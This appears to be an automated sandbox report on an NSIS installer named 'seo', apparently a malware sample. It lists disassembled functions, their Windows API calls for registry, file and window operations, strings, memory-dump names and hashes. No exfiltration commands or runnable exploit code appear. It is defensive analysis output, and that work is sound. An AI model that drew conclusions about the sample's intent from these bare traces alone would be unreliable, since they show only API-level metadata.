Strings

pLF, xrefs: 004063EA
>F, xrefs: 00406365
Ne@, xrefs: 004063B0
%s=%s, xrefs: 00406405
NUL, xrefs: 00406360
[Rename], xrefs: 0040648A, 00406499

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
API String ID: 565278875-2487742289
Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4

Function 004060CA Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 218stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00422579,74DF23A0,00000000), ref: 0040619B
GetSystemDirectoryW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,00002004), ref: 0040621D

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,EnglandAdventureMinnesotaCourtesyEnsuringEmission), ref: 0040627A
Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285

GetWindowsDirectoryW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,00002004), ref: 00406230
lstrcatW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
lstrlenW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,00447D88,?,00000000,00404AAA,00447D88,00000000,00422579,74DF23A0,00000000), ref: 0040630C

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004061EB
EnglandAdventureMinnesotaCourtesyEnsuringEmission, xrefs: 004060F1, 004061DD, 004061E3, 00406207, 0040621C, 0040622F, 0040624B, 00406276, 004062A9, 004062C8, 004062DD, 004062DE, 004062EC, 00406305, 0040630B, 00406318, 0040634E
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004062A4

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
String ID: EnglandAdventureMinnesotaCourtesyEnsuringEmission$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3935908587-661876478
Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D

Function 00403952 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040396C
GetSysColor.USER32(00000000), ref: 00403988
SetTextColor.GDI32(?,00000000), ref: 00403994
SetBkMode.GDI32(?,?), ref: 004039A0
GetSysColor.USER32(?), ref: 004039B3
SetBkColor.GDI32(?,?), ref: 004039C3
DeleteObject.GDI32(?), ref: 004039DD
CreateBrushIndirect.GDI32(?), ref: 004039E7

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54

Function 00402A2F Relevance: 10.6, APIs: 7, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
GlobalFree.KERNEL32(?), ref: 00402AD7
WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
GlobalFree.KERNEL32(00000000), ref: 00402AF2
CloseHandle.KERNEL32(?), ref: 00402B09
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8

Function 00404A73 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447D88,00422579,74DF23A0,00000000), ref: 00404AAB
lstrlenW.KERNEL32(0040304D,00447D88,00422579,74DF23A0,00000000), ref: 00404ABB
lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00422579,74DF23A0,00000000), ref: 0040619B

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58

Function 0040434F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
GetMessagePos.USER32 ref: 00404372
ScreenToClient.USER32(?,?), ref: 0040438A
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2

Strings

f, xrefs: 0040439E

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65

Function 00402DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
MulDiv.KERNEL32(00013000,00000064,000ED52A), ref: 00402DFD
wsprintfW.USER32 ref: 00402E0D
SetWindowTextW.USER32(?,?), ref: 00402E1D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F

Strings

verifying installer: %d%%, xrefs: 00402E07

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58

Function 00405AE7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
CharNextW.USER32(?,?,?,00000000), ref: 00405B59
CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

Strings

*?|<>/":, xrefs: 00405B39

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD

Function 00401497 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
RegCloseKey.ADVAPI32(?), ref: 004014FE
RegCloseKey.ADVAPI32(?), ref: 00401523
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69

Function 004020AF Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

GlobalFree.KERNEL32(007CEA08), ref: 00402139

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58

Function 00401D76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7

Strings

!, xrefs: 00401DAE

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758

Function 00403F13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
wsprintfW.USER32 ref: 00403FBD
SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0

Strings

%u.%u%s%s, xrefs: 00403FAA

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C

Function 004024F8 Relevance: 6.1, APIs: 4, Instructions: 78registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
lstrlenW.KERNEL32(004120F8), ref: 00402567
RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
RegCloseKey.ADVAPI32(?), ref: 004025B6

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C

Function 00401FFE Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00422579,74DF23A0,00000000), ref: 00404AAB
Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00422579,74DF23A0,00000000), ref: 00404ABB
